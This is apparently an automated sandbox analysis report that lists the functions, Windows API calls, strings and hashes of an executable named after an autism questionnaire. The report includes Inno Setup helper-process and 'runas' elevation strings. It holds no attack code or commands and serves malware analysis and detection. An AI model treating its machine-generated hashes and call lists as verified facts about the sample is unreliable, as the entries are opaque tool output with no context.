                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                                                              • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                                                              • Opcode Fuzzy Hash: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                                                              • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                                                                • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                                • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 4113206344-0
                                                                                              • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                              • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                                                              • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                              • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                                                              • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                                                              • Opcode Fuzzy Hash: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                                                              • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                                              • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                                                              • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                                              • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                                              • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                                                              • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                                              • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004103B4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 31276548-0
                                                                                              • Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                              • Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
                                                                                              • Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                              • Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
                                                                                              • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                                                              • Opcode Fuzzy Hash: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
                                                                                              • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                                              • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                                                              • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                                              • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405812, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405843
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00405866
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00405873
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Free$Query
                                                                                              • String ID:
                                                                                              • API String ID: 778034434-0
                                                                                              • Opcode ID: 9cf1a0e01308b3a939f0f8b7cd504775b3f588773c4986be2e6cc2d25f9c1fa1
                                                                                              • Instruction ID: 84a00d9712422ee72978a24a1d80a8d623c3a2aa13178c9074bfc96ea9226af9
                                                                                              • Opcode Fuzzy Hash: 9cf1a0e01308b3a939f0f8b7cd504775b3f588773c4986be2e6cc2d25f9c1fa1
                                                                                              • Instruction Fuzzy Hash: B8F08135704A009FD310EB2AC945B27B7E5EFC9750F19C17AE9889B3A0E635DC118B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 006257BC
                                                                                              • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                                                              • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
                                                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                                                                • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                                              • CreateProcessW.KERNEL32 ref: 00625986
                                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                                                              • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                                                                • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                              • API String ID: 770386003-3271284199
                                                                                              • Opcode ID: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                                                              • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                                                              • Opcode Fuzzy Hash: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                                                              • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                                                • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                                                • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                                                • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                                                • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                                                              • GetLastError.KERNEL32(00000000,006A6237,?,?,00000001), ref: 006A6178
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                                                              • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                              • API String ID: 254331816-221126205
                                                                                              • Opcode ID: 2609ea7e346f2b00e944a6579133f7cd7ad2ab1e7388d4ed423ae0c2cc39ebae
                                                                                              • Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
                                                                                              • Opcode Fuzzy Hash: 2609ea7e346f2b00e944a6579133f7cd7ad2ab1e7388d4ed423ae0c2cc39ebae
                                                                                              • Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

